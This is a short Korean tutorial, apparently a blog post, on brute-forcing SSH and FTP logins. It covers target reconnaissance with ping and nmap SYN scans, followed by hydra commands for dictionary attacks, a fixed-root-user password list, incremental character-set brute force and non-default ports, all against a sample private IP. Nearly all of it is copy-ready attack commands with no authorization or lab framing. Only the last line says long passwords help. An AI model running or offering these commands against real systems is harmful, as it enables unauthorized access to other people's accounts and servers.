1. 대상 싸이트 조회
(1) 대상 싸이트 IP 확인하기
형식 : ping 도메인
예시 : ping test.com
(2) 열린 포트 여부 확인하기 
형식 : nmap –sS IP
예시 : nmap –sS 192.168.0.100

2. 사전 파일 공격
-L 과 -P 옵션으로 사전파일을 이용해서 공격
많이 사용되는 단어를 모아서 아이디 및 패스워드 사전을 파일로 만들어서
무자별 대입함. 사전파일은 인터넷을 검색해서 구할수 있음
형식: hydra –L [아이디 사전파일] –P [비밀번호 사전파일] [대상 IP]  ssh –V -f
# hydra -L user.txt -P pass.txt 192.168.0.100 ssh(또는 ftp) -V –f
아이디는 고정해 놓고 비밀번호만 사전 파일로 무차별 대입할 경우
형식 : hydra –l [고정 아이디] –P [비밀번호 사전파일] [대상 IP]  ssh –V -f
# hydra –l root –P pass.txt 192.168.0.100 ssh(또는 ftp) -V –f

3. 순차 대입 공격
-x 옵션으로 비밀번호를 순차대입법으로 공격함.
-x 옵션 형식 : -x 옵션 다음에 숫자1:숫자2:a(A1특수문자)
숫자1은 최소자리수 / 숫자2는 최대자리수 / a 는 소문자 대표. a~z 전체를 의미함
/ A 는 대문자 대표. A~Z 전체를 의미함 / 1 은 숫자 대표. 0~9 전체를 의미함 /
특수문자는 각자 사용함.
# hydra -l root -x 4:4:a1 192.168.0.100 ssh(또는 ftp) -V –f
-x 옵션 예시)
1:5:a1   →  한자리 부터 5자리까지 소문자와 숫자를 조합해서 무차별 대입
6:6:1$  →  6자리로만 숫자와 특수문자$ 을 조합해서 무차별 대입
4:5:A1  →  4자리부터 5자리까지 대문자와 숫자를 조합해서 무차별 대입함

4. 수동 포트 옵션
공격 대상 PC의 서비스 포트가 디폴트가 아닌 경우 사용함.
형식 : -s [포트번호]
# hydra –s 3677 –l root –P pass.txt 192.168.0.100 ssh(또는 ftp) –V –f
# hydra –s 11175 –l root –x 4:5:A1 192.168.0.100 ssh(또는 ftp) -V -f

패스워드 길게 만들면 그래도 조금이나만 도움이 될것 같죠..